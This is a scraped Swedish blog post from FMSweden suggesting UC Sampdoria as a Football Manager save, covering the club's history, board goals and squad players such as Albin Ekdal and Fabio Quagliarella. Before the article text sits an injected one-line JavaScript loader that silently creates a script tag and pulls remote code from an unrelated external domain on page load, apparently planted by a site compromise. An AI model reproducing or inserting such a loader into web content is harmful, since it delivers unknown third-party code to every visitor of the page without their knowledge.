;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Veckans inspiration: UC Sampdoria – FMSweden
Meny Stäng

Veckans inspiration: UC Sampdoria

Denna vecka sneglar vi lite uppåt i seriesystemet och fokuserar på Unione Calcio Sampdoria som är tippade elva i Serie A. Den klassiska klubben från Genua har tillbringat 64 säsonger i högstaligan, denna sejour i cirka 10 år. Historiskt finns det en del framgångar att tala om, tidigt 1990-tal vann de Scudetton och nådde finalen i Europacupen säsongen därefter. Dessutom har de fyra cuptitlar i pokalskåpet. Likt värsta rivalerna Genoa CFC spelar de på arenan Luigi Ferraris med en kapacitet på drygt 37 000 åskådare. Gällande faciliteterna finns ingenting att klaga på. Något som är värt att poängtera är att klubbens ägare funderar på en försäljning, vilket förstås är en osäkerhetsfaktor att ta hänsyn till.

Styrelsen har bara två krav utöver att hamna på en mittenplacering (vilket är fullt rimligt), nämligen att spela underhållande fotboll och värva spelare från lägre divisioner. Bägge dessa målsättningar är dessutom lågt prioriterade, vilket ger dig som manager relativt stor frihet när det gäller att planera framtiden för klubben. Truppen då? Den svenske landslagsmittfältaren Albin Ekdal är vice-kapten och således en viktig pjäs i lagbygget, även om han har tuff konkurrens i form av den portugusiske landslagsspelaren Adrien Silva. Dessutom finns mittbacken Omar Colley här, han som spelade i Djurgården för några år sedan, samt Yoshida som spelade i Southampton länge. Offensivt finns det mycket sprängkraft i form av Antonio Candreva, Fabio Quagliarella, Manolo Gabbiadini, Gaston Ramírez, Keita Baldé med flera. Åldersmässigt finns det många spelare i sin peak, vilket tyder på att man behöver byta ut delar av truppen successivt under de första säsongerna vid rodret. Utmaningen blir att utmana om Europaplatserna i ligan, vilket förstås är ganska tufft med tanke på att det finns många högklassiga lag ovanför i förhandstipsen. Har du vad som krävs för att klara denna tuffa utmaning?

 

Please wait...

Liknande Inlägg

Lämna ett svar